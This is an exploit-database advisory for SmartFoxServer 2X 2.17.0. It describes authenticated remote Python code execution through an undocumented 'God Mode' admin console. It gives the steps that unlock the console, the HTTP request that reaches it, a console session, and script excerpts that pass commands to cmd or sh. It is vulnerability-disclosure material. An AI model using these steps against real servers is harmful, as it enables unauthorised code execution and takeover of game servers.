Exploits / Vulnerability Discovered : 2021-02-08 |
Type : local |
Platform : multiple
This exploit / vulnerability Smartfoxserver 2x 2.17.0 god mode console remote code execution is for educational purposes only and if it is used you will do on your own risk!
Summary: SmartFoxServer (SFS) is a comprehensive SDK for
rapidly developing multiplayer games and applications
with Adobe Flash/Flex/Air, Unity, HTML5, iOS, Universal
Windows Platform, Android, Java, C++ and more. SmartFoxServer
comes with a rich set of features, an impressive
documentation set, tens of examples with their source,
powerful administration tools and a very active support
forum. Born in 2004, and evolving continuously since
then, today SmartFoxServer is the leading middleware to
create large scale multiplayer games, MMOs and virtual
communities. Thanks to its simplicity of use, versatility
and performance, it currently powers hundreds of projects
all over the world, from small chats and turn-based games
to massive virtual worlds and realtime games.
Desc: An authenticated attacker can execute remote arbitrary
Python code after enabling and unlocking the undocumented
console module.
Tested on: Windows (all) 64bit installer
Linux/Unix 64bit installer
MacOS (10.8+) 64bit installer
Java 1.8.0_281
Python 3.9.1
Python 2.7.14
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
------------------------------------------------------
Undocumented functionality in software
#INABIAF (https://en.wikipedia.org/wiki/Undocumented_feature)
See also:
- Backdoor (computing)
- Easter egg (media)
God Mode Console (Console Module) unlock instructions:
------------------------------------------------------
$ pwd
/config/admin
$ vi /admintool.xml # Uncomment <module id="Console" name="Console" description="Interact with the SmartFoxServer instance via command line"/>
$ cd .. ;pwd
/config
$ touch ConsoleModuleUnlock.txt
Mac/Windows PoC:
----------------
GET http://localhost:8080/admin/modules/console.html HTTP/1.1
--------------------------------------
ADMIN_CONSOLE, version 3.0.0
--------------------------------------
Type help() for assistance.
> help()
zm SFSZoneManager
sfs SmartFoxServer
um SFSUserManager
api SFSApi
bum SFSBannedUserManager
xm SFSExtensionManager
eng BitSwarmEngine
sm DefaultSessionManager
extras() For more custom function calls
shortcuts() For keyboard shortcuts details
> eng
com.smartfoxserver.bitswarm.core.BitSwarmEngine@3823acc4
> extras()
version(): Shows the Console extension version
reloadScripts(): Reload the dynamic server scripts
execute(): Launches the last loaded script again
files(path): Shows the files at the specified path
controller(id): Obtain one of the controllers from its id. 0=System, 1=Extension, 2=Smasher
zones(): List of active zones
#
# This global variable allows to lock the Console so that it can't be misused
#
__CONSOLE_LOCK = False
# Java Imports
import java
from com.smartfoxserver.v2.entities.data import *
__scripts = [
{'name':'version()', 'doc':'Shows the Console extension version'},
{'name':'reloadScripts()', 'doc':'Reload the dynamic server scripts'},
{'name':'execute()', 'doc':'Launches the last loaded script again'},
{'name':'files(path)', 'doc':'Shows the files at the specified path'},
{'name':'controller(id)', 'doc':'Obtain one of the controllers from its id. 0=System, 1=Extension, 2=Smasher'},
{'name':'zones()', 'doc':'List of active zones'}
...
...
javashell.py:
-------------
# override defaults based on osType
if osType == "nt":
shellCmd = ["cmd", "/c"]
envCmd = "set"
envTransform = string.upper
elif osType == "dos":
shellCmd = ["command.com", "/c"]
envCmd = "set"
envTransform = string.upper
elif osType == "posix":
shellCmd = ["sh", "-c"]
envCmd = "env"
elif osType == "mac":
curdir = ':' # override Posix directories
pardir = '::'
elif osType == "None":
pass
# else:
# # may want a warning, but only at high verbosity:
# __warn( "Unknown os type '%s', using default behavior." % osType )